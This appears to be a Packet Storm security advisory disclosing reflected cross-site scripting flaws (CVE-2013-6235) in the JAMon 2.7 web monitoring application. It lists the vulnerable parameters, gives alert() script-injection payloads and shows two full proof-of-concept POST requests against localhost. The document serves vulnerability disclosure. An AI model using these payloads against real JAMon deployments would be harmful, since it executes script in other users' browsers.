the original cloud security

JAMon 2.7 Cross Site Scripting

JAMon 2.7 Cross Site Scripting
Posted Jan 24, 2014
Authored by Christian Catalano

JAMon version 2.7 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2013-6235
MD5 | d594d499a28f2d0b4b969524fa21fc42

JAMon 2.7 Cross Site Scripting

Change Mirror Download
###################################################
01. ### Advisory Information ###

Title: Multiple Reflected XSS vulnerabilities in JAMon
Date published: 2013-01-23
Date of last update: 2013-01-23
Vendors contacted: JAMon v 2.7
Discovered by: Christian Catalano
Severity: Low

02. ### Vulnerability Information ###

CVE reference: CVE-2013-6235
CVSS v2 Base Score: 4.3
CVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Component/s: JAMon v 2.7
Class: Input Manipulation

03. ### Introduction ###

The Java Application Monitor (JAMon) is a free, simple, high
performance, thread safe, Java API that allows developers to easily
monitor production applications.

http://jamonapi.sourceforge.net

04. ### Vulnerability Description ###

Multiple Non-Persistent Cross-Site Scripting vulnerabilities have been
identified in the JAMon web application.
JAMon contains a flaw that allows multiple reflected cross-site
scripting (XSS) attacks.
This flaw exists because certain pages do not validate input before
returning it to users.

+------------------------------+-------------------+
|-Vulnerable module(s)--------and----parameter(s)--|
+------------------------------+-------------------+
|mondetail.jsp --------------------ArraySQL--------|
|mondetail.jsp --------------------listenertype----|
|mondetail.jsp --------------------currentlistener-|
|jamonadmin.jsp -------------------ArraySQL--------|
|sql.jsp---------------------------ArraySQL--------|
|exceptions.jsp--------------------ArraySQL--------|
+------------------------------+-------------------+

05. ### Technical Description / Proof of Concept Code ###

05.01) Malicious Request ("ArraySQL" parameter):

The vulnerability is located in the ' Filter (optional) ' input field
upon submission to the pages

http://localhost/jamon/mondetail.jsp
http://localhost/jamon/ jamonadmin.jsp
http://localhost/jamon/ sql.jsp
http://localhost/jamon/ exceptions.jsp

The application does not validate the 'ArraySQL' parameter upon
submission to the *.jsp scripts.
The attacker can inject the malicious javascript code:

1-->1<ScRiPt >alert('XSS')</ScRiPt><!--

in the ' Filter (optional) ' input field and click on GO! button.

05.02) Malicious Request ("listenertype " parameter)

POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 209

listenertype=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--&currentlistener=JAMonBufferListener&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21


05.03) Malicious Request ("currentlistener " parameter)

POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

listenertype=value&currentlistener=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21

06. ### Business Impact ###

This may allow an attacker to create a specially crafted request that
would execute arbitrary script code in a user's browser within the trust
relationship between their browser and the server.

07. ### Systems Affected ###

This vulnerability was tested against: JAMon v2.7
Older versions are probably affected too, but they were not checked.

08. ### Vendor Information, Solutions and Workarounds ###

Currently, there are no known upgrades or patches to correct this
vulnerability.

09. ### Credits ###

This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com

10. ### Vulnerability History ###

October 18th, 2013: Vulnerability identification
October 22th, 2013: Vendor notification [JAMon]
December 10th, 2013: Vulnerability confirmation [JAMonI]
January 23th, 2014: Vulnerability disclosure

11. ### Disclaimer ###

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.

###################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close